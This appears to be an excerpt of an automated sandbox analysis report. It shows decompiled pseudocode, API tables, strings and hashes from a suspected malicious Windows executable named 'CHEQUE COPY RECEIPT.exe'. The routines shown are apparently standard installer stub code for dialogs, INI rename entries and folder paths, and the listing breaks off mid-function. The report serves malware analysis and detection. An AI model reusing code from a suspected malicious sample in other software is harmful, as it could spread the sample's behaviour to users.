							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								_t40 =  &_v8; // 0x42e3e0
								E004046E0(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f448, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f448, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a090 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BC();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ec1c; // 0x7a00a6
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f498;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404407;
				E004042D1(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404306(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f454 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x429884 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429884 = 0;
				return 0;
			}

0x0040444c
0x00404571
0x004045cd
0x004045d1
0x0040469e
0x004046a0
0x004046a0
0x004046a6
0x004046a6
0x004046a9
0x00000000
0x004046b0
0x004045df
0x004045e1
0x004045eb
0x004045f6
0x004045f9
0x004045fc
0x00404607
0x0040460a
0x00404611
0x0040461f
0x00404637
0x00404639
0x0040463b
0x00404641
0x00404650
0x00404652
0x00404652
0x00404611
0x0040465c
0x00000000
0x00404667
0x0040466b
0x0040467c
0x0040467c
0x00404682
0x00404690
0x00404690
0x00000000
0x00404694
0x0040465c
0x0040457c
0x00000000
0x00404590
0x00404596
0x0040459c
0x00000000
0x00000000
0x004045c1
0x004045c3
0x004045c8
0x00000000
0x004045c8
0x0040457c
0x00404452
0x00404455
0x0040445a
0x0040445c
0x0040446b
0x0040446b
0x00404472
0x00404475
0x00404477
0x0040447c
0x00404485
0x0040448b
0x00404497
0x0040449a
0x004044a3
0x004044a8
0x004044ab
0x004044b0
0x004044c7
0x004044ce
0x004044e1
0x004044e4
0x004044f9
0x00404500
0x00404505
0x0040450a
0x0040450a
0x00404519
0x00404528
0x0040453a
0x0040453f
0x0040454f
0x00404551
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044C7
GetDlgItem.USER32 ref: 004044DB
SendMessageA.USER32 ref: 004044F9
GetSysColor.USER32(?), ref: 0040450A
SendMessageA.USER32 ref: 00404519
SendMessageA.USER32 ref: 00404528
lstrlenA.KERNEL32(?), ref: 0040452B
SendMessageA.USER32 ref: 0040453A
SendMessageA.USER32 ref: 0040454F
GetDlgItem.USER32 ref: 004045B1
SendMessageA.USER32 ref: 004045B4
GetDlgItem.USER32 ref: 004045DF
SendMessageA.USER32 ref: 0040461F
LoadCursorA.USER32 ref: 0040462E
SetCursor.USER32(00000000), ref: 00404637
LoadCursorA.USER32 ref: 0040464D
SetCursor.USER32(00000000), ref: 00404650
SendMessageA.USER32 ref: 0040467C
SendMessageA.USER32 ref: 00404690

Strings

N, xrefs: 004045CD
B, xrefs: 0040463B

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$B
API String ID: 3103080414-4074832742
Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f454;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Setup Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Setup Setup
API String ID: 941294808-1602013819
Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EBC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c648 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
						_t53 = _t52 + 0x10;
						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA1(_t24 + _t46, 0x42c248, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E8D(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE6(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405ebc
0x00405ec5
0x00405ecc
0x00405ee0
0x00405f08
0x00405f13
0x00405f17
0x00405f37
0x00405f3e
0x00405f48
0x00405f55
0x00405f5a
0x00405f5f
0x00405f63
0x00405f72
0x00405f74
0x00405f81
0x00405f85
0x00406020
0x00000000
0x00405f9b
0x00405fa8
0x00405fcc
0x00405fd0
0x00405fef
0x00405ff3
0x00405ff3
0x00405ff5
0x00405ffe
0x00406009
0x00406014
0x0040601a
0x00000000
0x0040601a
0x00405fd2
0x00405fd5
0x00405fe0
0x00405fdc
0x00405fde
0x00405fdf
0x00405fdf
0x00405fe7
0x00405fe9
0x00000000
0x00405fe9
0x00405fb3
0x00405fb9
0x00000000
0x00405fb9
0x00405f85
0x00405f63
0x00405ee2
0x00405eed
0x00405ef6
0x00405efa
0x00000000
0x00000000
0x00405efa
0x0040602b

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
GetShortPathNameA.KERNEL32 ref: 00405EF6

Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D

GetShortPathNameA.KERNEL32 ref: 00405F13
wsprintfA.USER32 ref: 00405F31
GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
GlobalFree.KERNEL32 ref: 0040601A
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021

Part of subcall function 00405DE6: GetFileAttributesA.KERNEL32(00000003,00402F34,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,80000000,00000003), ref: 00405DEA
Part of subcall function 00405DE6: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

Strings

[Rename], xrefs: 00405F9B, 00405FAD
%s=%s, xrefs: 00405F27

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
Opcode Fuzzy Hash: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004062E0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ec1c; // 0x7a00a6
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f498;
				_t39 = 0x42e3e0;
				_t90 = 0x42e3e0;
				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004061AB(_t90,  *0x42f448);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406528(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f44c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4e4;
						if( *0x42f4e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f444;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062E0(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E0040624D(_a4, _t39);
			}

0x004062e0
0x004062e0
0x004062e0
0x004062e6
0x004062eb
0x004062ed
0x004062fc
0x004062fc
0x00406304
0x00406305
0x00406306
0x00406307
0x0040630a
0x00406312
0x00406314
0x0040632b
0x0040632e
0x0040632e
0x00406505
0x00406505
0x00406509
0x00000000
0x00000000
0x0040633b
0x00406341
0x00000000
0x00000000
0x00406347
0x00406348
0x0040634b
0x0040634e
0x004064f8
0x00406502
0x00406504
0x00406504
0x004064fa
0x004064fc
0x004064fe
0x004064ff
0x004064ff
0x00000000
0x004064f8
0x00406354
0x00406358
0x00406368
0x0040636f
0x00406372
0x0040637a
0x0040637d
0x00406384
0x00406385
0x00406388
0x004064a5
0x004064a8
0x004064d8
0x004064db
0x004064e0
0x004064e4
0x004064e4
0x004064e9
0x004064ef
0x004064f1
0x00000000
0x004064f1
0x004064aa
0x004064ad
0x004064c2
0x004064c9
0x004064af
0x004064b6
0x004064b6
0x004064d1
0x004064d4
0x0040649d
0x0040649e
0x0040649e
0x00000000
0x004064d4
0x0040638e
0x00406395
0x00406397
0x00406398
0x004063b2
0x004063b2
0x004063b9
0x004063b9
0x004063c0
0x004063c4
0x004063c4
0x004063c5
0x004063c7
0x00406400
0x00406403
0x00406413
0x00406416
0x0040641e
0x00406424
0x00406424
0x00406483
0x00406483
0x00406485
0x00000000
0x00000000
0x00406428
0x0040642f
0x00406430
0x00406432
0x0040644c
0x0040645a
0x00406460
0x00406462
0x00406480
0x00406480
0x00406480
0x00000000
0x00406480
0x00406468
0x00406471
0x00406474
0x0040647a
0x0040647e
0x00000000
0x00000000
0x00000000
0x0040647e
0x00406434
0x00406437
0x00000000
0x00000000
0x00406446
0x00406448
0x0040644a
0x00000000
0x00000000
0x00000000
0x0040644a
0x00000000
0x00406483
0x0040640b
0x00000000
0x004063c9
0x004063e4
0x004063e9
0x004063ec
0x0040648c
0x0040648c
0x00406490
0x00406498
0x00406498
0x00000000
0x00406490
0x004063f6
0x00406487
0x00406487
0x0040648a
0x00000000
0x00000000
0x00000000
0x0040648a
0x004063c7
0x0040639a
0x0040639e
0x00000000
0x00000000
0x004063a0
0x004063a4
0x00000000
0x00000000
0x004063a6
0x004063aa
0x00000000
0x004063ac
0x004063ac
0x00000000
0x004063ac
0x004063aa
0x0040650f
0x00406519
0x00406525
0x00406525
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 0040640B
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
CoTaskMemFree.OLE32(00000000), ref: 00406474
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA

Strings

Call, xrefs: 0040630A, 004063D7, 004063D8, 004063D9, 004063F5, 0040640A, 0040641D, 00406439, 00406464, 00406497, 0040649D, 004064B5, 004064C8, 004064E3, 004064E9, 004064F1, 0040651B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406492
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063DA

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 73CA24D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E73CA24D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E73CA1215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M73CA2626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x73ca307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x73ca309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73CA1429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x73ca405c);
								goto L17;
							case 4:
								__ecx =  *0x73ca405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x73ca405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								" {<u@u<u"();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x73ca405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73ca4000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
